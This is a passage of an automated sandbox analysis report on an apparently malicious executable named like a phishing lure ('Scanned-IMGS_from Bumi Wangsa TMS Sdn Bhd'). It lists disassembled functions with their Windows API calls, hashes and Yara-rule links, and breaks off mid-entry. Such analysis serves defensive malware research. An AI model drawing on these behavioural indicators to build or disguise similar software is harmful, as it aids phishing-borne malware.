                                                        • Instruction Fuzzy Hash: 5B0175B17041057BE204A6259D42FEBB79CAB613B4F84C63AFD0896287FA51DF5283E1
                                                        Function 00A84D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00A84D5C
                                                        • __beginthreadex.LIBCMT ref: 00A84D7A
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00A84D8F
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A84DA5
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A84DAC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                        • String ID:
                                                        • API String ID: 3824534824-0
                                                        • Opcode ID: 0d1963da17d5c71f9309192a7a7723c0b66db296d1ad8008fea239451fb20db1
                                                        • Instruction ID: 7f37e6391e5e22e59426ceca748d5b78a02737e7830775a786bf3ee5d3d0c190
                                                        • Opcode Fuzzy Hash: 0d1963da17d5c71f9309192a7a7723c0b66db296d1ad8008fea239451fb20db1
                                                        • Instruction Fuzzy Hash: C0110876D04245BFCB05DBE89C48ADA7FACEB49320F144765FA14D7390D7758D0587A0
                                                        Function 00A7874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A78766
                                                        • GetLastError.KERNEL32(?,00A7822A,?,?,?), ref: 00A78770
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00A7822A,?,?,?), ref: 00A7877F
                                                        • HeapAlloc.KERNEL32(00000000,?,00A7822A,?,?,?), ref: 00A78786
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A7879D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: e4fd48d5031406ce734e3f94e4023dfd3e310a4b9ff54e33362a5a18b2240969
                                                        • Instruction ID: 6aa11b7f053c5f9fc8cb81e04e82ce7274ea106100349a4b57eb8d2b8e70209e
                                                        • Opcode Fuzzy Hash: e4fd48d5031406ce734e3f94e4023dfd3e310a4b9ff54e33362a5a18b2240969
                                                        • Instruction Fuzzy Hash: 9F014F71240205EFDB288FEADC4CD677B6CEF863557204529F94AC2160DB318C01CA60
                                                        Function 00A854E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A85502
                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A85510
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A85518
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A85522
                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A8555E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 687bc2ccde5229cf603b6dd7c6327d35c2a0266914bb3f2411c5745a5575c0d3
                                                        • Instruction ID: 3c0282e1b3ff691937465d2cb2d3a885f28d9ce42254bfcb801b0ebbc542b58f
                                                        • Opcode Fuzzy Hash: 687bc2ccde5229cf603b6dd7c6327d35c2a0266914bb3f2411c5745a5575c0d3
                                                        • Instruction Fuzzy Hash: 8F015B35C00A1ADBCF08EFF9E848AEDBB79BB09701F000156E941B2140DB315655CBA1
                                                        Function 00A77652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?,?,00A7799D), ref: 00A7766F
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A7768A
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A77698
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?), ref: 00A776A8
                                                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A7758C,80070057,?,?), ref: 00A776B4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: 84e1180e73686edac0868357a6e76e0500b4302d5b6ace4862a44361f5ba9dcb
                                                        • Instruction ID: 94861a78da095d8fd991d2b1070b34e1f9a736521be4ec7130b18c537521111f
                                                        • Opcode Fuzzy Hash: 84e1180e73686edac0868357a6e76e0500b4302d5b6ace4862a44361f5ba9dcb
                                                        • Instruction Fuzzy Hash: DF01D476600605BFDB119F98DC04BAE7BACEB49751F208128FD08D2225E735DD0197A0
                                                        Function 00A785F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A78608
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A78612
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A78621
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A78628
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A7863E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 0f70531a1d89a6b87e712f9eb3ba5c1146bdbfb446db0b24565de8751296165d
                                                        • Instruction ID: 40a64ec088ed5d71db9850d64380216323e166f798b16869785d4c22378cec80
                                                        • Opcode Fuzzy Hash: 0f70531a1d89a6b87e712f9eb3ba5c1146bdbfb446db0b24565de8751296165d
                                                        • Instruction Fuzzy Hash: 43F0C230240205BFEB104FE4DC8DE6B3BACEF8AB55B008135F90DC6190EBB09C42DA60
                                                        Function 00A78652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A78669
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A78673
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78682
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A78689
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A7869F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 7da359649348e90c7bafb3dc886bc6a12998b3b8eb7cd6cf4f9a02222368b216
                                                        • Instruction ID: 0932e4292770afd99c5865ba7ae3ecdddb2c5e843c6f2f83a6efac79fb12701b
                                                        • Opcode Fuzzy Hash: 7da359649348e90c7bafb3dc886bc6a12998b3b8eb7cd6cf4f9a02222368b216
                                                        • Instruction Fuzzy Hash: ADF0AF70240205BFEB215FE4EC8CE673BACEF8A765B104025F909C6290DBA09802EA61
                                                        Function 00A7C6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00A7C6BA
                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00A7C6D1
                                                        • MessageBeep.USER32(00000000), ref: 00A7C6E9
                                                        • KillTimer.USER32(?,0000040A), ref: 00A7C705
                                                        • EndDialog.USER32(?,00000001), ref: 00A7C71F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                        • String ID:
                                                        • API String ID: 3741023627-0
                                                        • Opcode ID: 4d26472f9cdecae2bfe92da3cb91c016b26a5ecc47013f338724a0ae9fa466bd
                                                        • Instruction ID: 95fd45fcfb306cd2324c29fd5408d8995690283b92380ccc2e890d90092b9a8c
                                                        • Opcode Fuzzy Hash: 4d26472f9cdecae2bfe92da3cb91c016b26a5ecc47013f338724a0ae9fa466bd
                                                        • Instruction Fuzzy Hash: DB01D630400705ABEB289FA0DD8EF9677B8FF01701F00866DF586A14E1EBF0A9558F84
                                                        Function 00A213B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 00A213BF
                                                        • StrokeAndFillPath.GDI32(?,?,00A5BAD8,00000000,?), ref: 00A213DB
                                                        • SelectObject.GDI32(?,00000000), ref: 00A213EE
                                                        • DeleteObject.GDI32 ref: 00A21401
                                                        • StrokePath.GDI32(?), ref: 00A2141C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: f8e819da063c73a2ef949ee870d428a6195c6175bc321854c26574b527433726
                                                        • Instruction ID: 203c979e47c6b9f3dde11c4ab45f549d499cef4b83c464200865279ee23cef55
                                                        • Opcode Fuzzy Hash: f8e819da063c73a2ef949ee870d428a6195c6175bc321854c26574b527433726
                                                        • Instruction Fuzzy Hash: C1F0C970004249EFDB1ADFEAEC8C7583BA5AB21366F048625E469890F1D7314997DF50
                                                        Function 00A8C602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 00A8C69D
                                                        • CoCreateInstance.OLE32(00AB2D6C,00000000,00000001,00AB2BDC,?), ref: 00A8C6B5
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                        • CoUninitialize.OLE32 ref: 00A8C922
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                        • String ID: .lnk
                                                        • API String ID: 2683427295-24824748
                                                        • Opcode ID: f36a344bd6b4a7d902c83bfa6db7d8c9a2765d6bd6d98d8b38b9c340a59f3262
                                                        • Instruction ID: d6b52c7b46e74634be1a436c68c7cd2fdd757bf4f03d3e2a1d2b4fb966a8cb48
                                                        • Opcode Fuzzy Hash: f36a344bd6b4a7d902c83bfa6db7d8c9a2765d6bd6d98d8b38b9c340a59f3262
                                                        • Instruction Fuzzy Hash: FBA14C71108315AFD700EF68D991EABB7E8FF84744F00492CF5969B192EB70EA09CB52
                                                        Function 00A32E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A40FF6: std::exception::exception.LIBCMT ref: 00A4102C
                                                          • Part of subcall function 00A40FF6: __CxxThrowException@8.LIBCMT ref: 00A41041
                                                          • Part of subcall function 00A27F41: _memmove.LIBCMT ref: 00A27F82
                                                          • Part of subcall function 00A27BB1: _memmove.LIBCMT ref: 00A27C0B
                                                        • __swprintf.LIBCMT ref: 00A3302D
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00A32EC6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 3d527612e4ba65731a6d09a5f8232b7369c8d5be6f41db2fd4a8e0ec70ac0a6d
                                                        • Instruction ID: 1ea54409e8d94a19b46cfaddeac1c7b9225eb1cb26e23884e3527f44973f4c50
                                                        • Opcode Fuzzy Hash: 3d527612e4ba65731a6d09a5f8232b7369c8d5be6f41db2fd4a8e0ec70ac0a6d
                                                        • Instruction Fuzzy Hash: 47916D765083119FCB18EF28EA85C6FB7B4EF85750F04492DF4869B2A1DA70EE44CB52
                                                        Function 00A8BBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00A248AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A248A1,?,?,00A237C0,?), ref: 00A248CE
                                                        • CoInitialize.OLE32(00000000), ref: 00A8BC26
                                                        • CoCreateInstance.OLE32(00AB2D6C,00000000,00000001,00AB2BDC,?), ref: 00A8BC3F
                                                        • CoUninitialize.OLE32 ref: 00A8BC5C
                                                          • Part of subcall function 00A29997: __itow.LIBCMT ref: 00A299C2
                                                          • Part of subcall function 00A29997: __swprintf.LIBCMT ref: 00A29A0C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                        • String ID: .lnk
                                                        • API String ID: 2126378814-24824748
                                                        • Opcode ID: a3ff588b03fb8b954a6a33c9d68f7e5eeae73e3873a59f9c24a53246d00ac05a
                                                        • Instruction ID: f0108c3ee12cf2cf5677fdceb11393a8c1e0fb452625b97f4e6d0a9780dfebbb
                                                        • Opcode Fuzzy Hash: a3ff588b03fb8b954a6a33c9d68f7e5eeae73e3873a59f9c24a53246d00ac05a
                                                        • Instruction Fuzzy Hash: 57A17875604311AFCB10EF18C584D6ABBE5FF89714F048998F8999B3A2CB31ED45CB91
                                                        Function 00A4524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __startOneArgErrorHandling.LIBCMT ref: 00A452DD
                                                          • Part of subcall function 00A50340: __87except.LIBCMT ref: 00A5037B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: ErrorHandling__87except__start
                                                        • String ID: pow
                                                        • API String ID: 2905807303-2276729525
                                                        • Opcode ID: 10a212efb9ae6c8ad5549458dbe865c491c06c3983db14398a21c0fb661cb80b
                                                        • Instruction ID: a5bf6454026f3d96bbe87cf98fe63fa8540f001f0bdfead012033509365e040c
                                                        • Opcode Fuzzy Hash: 10a212efb9ae6c8ad5549458dbe865c491c06c3983db14398a21c0fb661cb80b
                                                        • Instruction Fuzzy Hash: 20519E35E0D60187CB11BB34CA517BE2BB4BB80751F208D59E8D58A1E7EFB48CC89A41
                                                        Function 00A4023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: #$+
                                                        • API String ID: 0-2552117581
                                                        • Opcode ID: e77e427241a3a8ac14009d0d7038c1a66d006d38f6971901c4e9b0a8eb47401a
                                                        • Instruction ID: 913a0aace53fdf59619b779083e0dc2ee94c642c366a9acbe91e5d60cfd6d1b7
                                                        • Opcode Fuzzy Hash: e77e427241a3a8ac14009d0d7038c1a66d006d38f6971901c4e9b0a8eb47401a
                                                        • Instruction Fuzzy Hash: D65131399042468FDF25DF78C888AFA7BB4EF5A310F14C065EC959B2A1C774AD42C720
                                                        Function 00A362F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AD5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340971400.0000000000ADF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340994598.0000000000AE8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_a20000_Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd.jbxd
                                                        Similarity
                                                        • API ID: _memset$_memmove
                                                        • String ID: ERCP
                                                        • API String ID: 2532777613-1384759551
                                                        • Opcode ID: 20af24e439dd2558d520341a5c00f6b574ac205b233370a3aede4208098c5ce1
                                                        • Instruction ID: cda117e34ea6294fab7b835e3b67db738d2976a40e55b24376a75da99573e00b
                                                        • Opcode Fuzzy Hash: 20af24e439dd2558d520341a5c00f6b574ac205b233370a3aede4208098c5ce1
                                                        • Instruction Fuzzy Hash: 01519171900709EBDB24CF65C991BAABBF4EF44714F20C56EE64ACB241E7719584CB50
                                                        Function 00AA7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00AAF910,00000000,?,?,?,?), ref: 00AA7C4E
                                                        • GetWindowLongW.USER32 ref: 00AA7C6B
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00AA7C7B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1340821603.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                        • Associated: 00000000.00000002.1340799372.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1340924759.0000000000AAF000.00000002.00000001.01000000.00000003.sdmpDownload File
